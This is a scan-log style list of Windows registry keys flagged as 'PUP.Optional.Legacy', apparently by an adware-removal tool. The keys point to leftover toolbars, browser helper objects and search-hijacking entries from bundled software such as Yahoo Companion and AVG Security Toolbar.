PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks|{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks|{D3D233D5-9F6D-436C-B6C7-E63F77503B30}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{CCB69577-088B-4004-9ED8-FF5BCC83A039}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{8736C681-37A0-40C6-A0F0-4C083409151C}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{8F0B76E1-4E46-427B-B55B-B90593468AC6}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CC99A798-FD3D-4AB4-969E-6071612524F9}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Activities\Search\ask.com
PUP.Optional.Legacy             HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\VisualBee for Microsoft PowerPoint
PUP.Optional.Legacy             HKCU\Software\YahooPartnerToolbar
PUP.Optional.Legacy             HKCU\Software\Yahoo\Companion
PUP.Optional.Legacy             HKCU\Software\Yahoo\YFriendsBar
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\ScriptHelper.EXE
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\escort.DLL
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
PUP.Optional.Legacy             HKLM\SOFTWARE\Classes\AppID\esrv.EXE
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{56AD7EEE-D6C0-410E-8A7B-811DEA764554}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{7375D127-3955-4654-8E7D-1949A7A9C902}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{AF85DB83-06F2-4ECF-97CF-C46EDB06BE29}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
PUP.Optional.Legacy             HKLM\Software\Classes\AppID\{E8EB2F1F-661E-4A7F-8F9A-77DEB757A906}
PUP.Optional.Legacy             HKLM\Software\Classes\CLSID\{990F7D4F-09EF-47DF-9ABE-BAF2DCCF5C4B}
PUP.Optional.Legacy             HKLM\Software\Classes\ComObject.DeskbarEnabler
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{0400EBCA-042C-4000-AA89-9713FBEDB671}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{067ECE13-6DD2-47C7-8EFE-24DA8BC1D8DA}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{0BD19251-4B4B-4B94-AB16-617106245BB7}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{371AD4A5-1520-4AA2-A8A4-F9AD3BAC6957}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{44B29DDD-CF7A-454A-A275-A322A398D93F}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{6E673599-659A-439E-837D-A0931AFA3A7F}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{7F124846-5453-4BB8-A41D-E11481FFC9DF}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{84654D5D-611C-41C9-BBA1-BEB77502F633}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{8FD65019-BF09-45DA-AD81-E95AE911F1FD}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{AB50591C-2474-4890-9D06-518D415ADA7C}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{B2793774-A9B9-43FB-94F8-EC94BF3E6BC2}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{B2DB115C-8278-4947-9A07-57B53D1C4215}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{B97FC455-DB33-431D-84DB-6F1514110BD5}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{E72E9312-0367-4216-BFC7-21485FA8390B}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{EF6A3723-635E-4905-A0F8-5FAC26932330}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
PUP.Optional.Legacy             HKLM\Software\Classes\Interface\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}
PUP.Optional.Legacy             HKLM\Software\Classes\Sample.BrowserHandler
PUP.Optional.Legacy             HKLM\Software\Classes\Sample.YTBPartnerSample
PUP.Optional.Legacy             HKLM\Software\Classes\Search.BrowserWndAPI
PUP.Optional.Legacy             HKLM\Software\Classes\Search.PugiObj
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{07CAC314-E962-4F78-89AB-DD002F2490EE}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{76481128-CCDC-4073-8F65-B06F23B138FC}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{B87F8B63-7274-43FD-87FA-09D3B7496148}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{B944FF5E-EC87-4E1E-8C49-2FF3BC573997}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{C4BAE205-5E02-4E32-876E-F34B4E2D000C}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{CC6A58F3-FD45-4D29-BD83-3F87ACEAAEEE}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{F6C2BABA-9E4C-425F-9AEC-24AB8F2B640D}
PUP.Optional.Legacy             HKLM\Software\Classes\TypeLib\{FBC322D5-407E-4854-8C0B-555B951FD8E3}
PUP.Optional.Legacy             HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
PUP.Optional.Legacy             HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}
PUP.Optional.Legacy             HKLM\Software\Microsoft\Shared Tools\MSConfig\startupreg\AGupdate
PUP.Optional.Legacy             HKLM\Software\Microsoft\Shared Tools\MSConfig\startupreg\BFHP
PUP.Optional.Legacy             HKLM\Software\Microsoft\Shared Tools\MSConfig\startupreg\PCKeeperLive
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0E12F736682067FDE4D1158D5940A82E
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A24B5BB8521B03E0C8D908F5ABC0AE6
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2B0D56C4F4C46D844A57FFED6F0D2852
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49D4375FE41653242AEA4C969E4E65E0
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6AA0923513360135B272E8289C5F13FA
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F7467AF8F29C134CBBAB394ECCFDE96
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\922525DCC5199162F8935747CA3D8E59
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BCDA179D619B91648538E3394CAC94CC
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D677B1A9671D4D4004F6F2A4469E86EA
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DD1402A9DD4215A43ABDE169A41AFA0E
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E36E114A0EAD2AD46B381D23AD69CDDF
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EF8E618DB3AEDFBB384561B5C548F65E
PUP.Optional.Legacy             HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A28B4D68DEBAA244EB686953B7074FEF
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\BEFRUGAL
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\VBMZ
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\Yahoo\Companion
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\ScriptHelper.EXE
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\TbCommonUtils.DLL
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\TbHelper.EXE
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\escorTlbr.DLL
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\escort.DLL
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\escortApp.DLL
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\escortEng.DLL
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\esrv.EXE
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{56AD7EEE-D6C0-410E-8A7B-811DEA764554}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{7375D127-3955-4654-8E7D-1949A7A9C902}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{AF85DB83-06F2-4ECF-97CF-C46EDB06BE29}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\AppID\{E8EB2F1F-661E-4A7F-8F9A-77DEB757A906}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{067ECE13-6DD2-47C7-8EFE-24DA8BC1D8DA}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{08613A51-6E3E-43CC-9ECF-DD58B5837341}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{153EDC41-A2CC-4BEB-9EC8-008242389E50}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{188028B8-D91D-4BE2-BABA-68E32BDE4420}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{1C950DE5-D31E-42FB-AFB9-91B0161633D8}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{28E74F15-18C2-465E-B545-6CC738121C68}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{2BF6042B-B9B1-46D9-A3F8-9C987FADD4C6}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{3BDF4CE9-E81D-432B-A55E-9F0570CE811F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{408CFAD9-8F13-4747-8EC7-770A339C7237}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{40A222E2-93B1-45F9-9B07-0D1160A31A6C}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{40A61B9E-B111-46EE-A1F2-C1100192BA48}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{4ED063C9-4A0B-4B44-A9DC-23AFF424A0D3}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{6325A84C-E746-4007-A9C5-E4C1A50ED61F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{63EDCDD3-8AFC-4358-A90F-F7FB8F5C64FF}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{7E65CDDB-BB80-4C5D-8B07-5E280CCABC15}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{9912DD71-1FDF-455B-99D3-D690A1C607D8}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{9BCA87A0-5B8F-4500-A5AF-EA1279714FDF}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{9F34B17E-FF0D-4FAB-97C4-9713FEE79052}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{A9A56B8E-2DEB-4ED3-BC92-1FA450BCE1A5}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{AE338F6D-5A7C-4D1D-86E3-C618532079B5}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{BB17DE65-B548-48C2-AC73-1FD1996C7261}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{BC9FD17D-30F6-4464-9E53-596A90AFF023}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{BD5843ED-13C4-4EFF-ACE9-56CEE22BC087}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{C339D489-FABC-41DD-B39D-276101667C70}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{C358B3D0-B911-41E3-A276-E7D43A6BA56D}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{C77D3EEF-FDCA-4D37-B0D2-5FF650E07825}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{CC5AD34C-6F10-4CB3-B74A-C2DD4D5060A3}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{CC99A798-FD3D-4AB4-969E-6071612524F9}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{D433A9D0-8267-40CB-8AD5-24F22FA5373F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{D89031C2-10DA-4C90-9A62-FCED012BC46B}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{DC4F1329-2852-42D3-83F1-ED8DF06E3EC7}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{EA70EB31-CBAD-4862-AFDA-DCFCC32722ED}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{EC9100F8-5918-4F1B-9CC1-4D34A64E0FE0}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\CLSID\{F1A1ABE3-F454-4DD9-B520-01F2EEC5F0DD}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{0400EBCA-042C-4000-AA89-9713FBEDB671}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{067ECE13-6DD2-47C7-8EFE-24DA8BC1D8DA}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{0BD19251-4B4B-4B94-AB16-617106245BB7}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{371AD4A5-1520-4AA2-A8A4-F9AD3BAC6957}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{44B29DDD-CF7A-454A-A275-A322A398D93F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{7F124846-5453-4BB8-A41D-E11481FFC9DF}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{8FD65019-BF09-45DA-AD81-E95AE911F1FD}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{B2DB115C-8278-4947-9A07-57B53D1C4215}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{B97FC455-DB33-431D-84DB-6F1514110BD5}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{E72E9312-0367-4216-BFC7-21485FA8390B}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\Interface\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{07CAC314-E962-4F78-89AB-DD002F2490EE}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{76481128-CCDC-4073-8F65-B06F23B138FC}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{B87F8B63-7274-43FD-87FA-09D3B7496148}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{B944FF5E-EC87-4E1E-8C49-2FF3BC573997}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{C4BAE205-5E02-4E32-876E-F34B4E2D000C}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{CC6A58F3-FD45-4D29-BD83-3F87ACEAAEEE}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{F6C2BABA-9E4C-425F-9AEC-24AB8F2B640D}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Classes\TypeLib\{FBC322D5-407E-4854-8C0B-555B951FD8E3}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CF10C1C0-B598-4ADB-B353-42C991C99A2E}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\SearchScopes\{b0441a0e-a49a-4e16-afc1-74ecced1921f}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Toolbar|{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{8F0B76E1-4E46-427B-B55B-B90593468AC6}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{CCB69577-088B-4004-9ED8-FF5BCC83A039}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
PUP.Optional.Legacy             HKLM\Software\Wow6432Node\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
PUP.Optional.Legacy             HKLM\System\CurrentControlSet\Services\EventLog\Application\geekbuddyrsp
PUP.Optional.Legacy             HKU\.DEFAULT\Software\AVG Secure Search
PUP.Optional.Legacy             HKU\.DEFAULT\Software\AppDataLow\Software\AVG Security Toolbar
PUP.Optional.Legacy             HKU\.DEFAULT\Software\IGearSettings
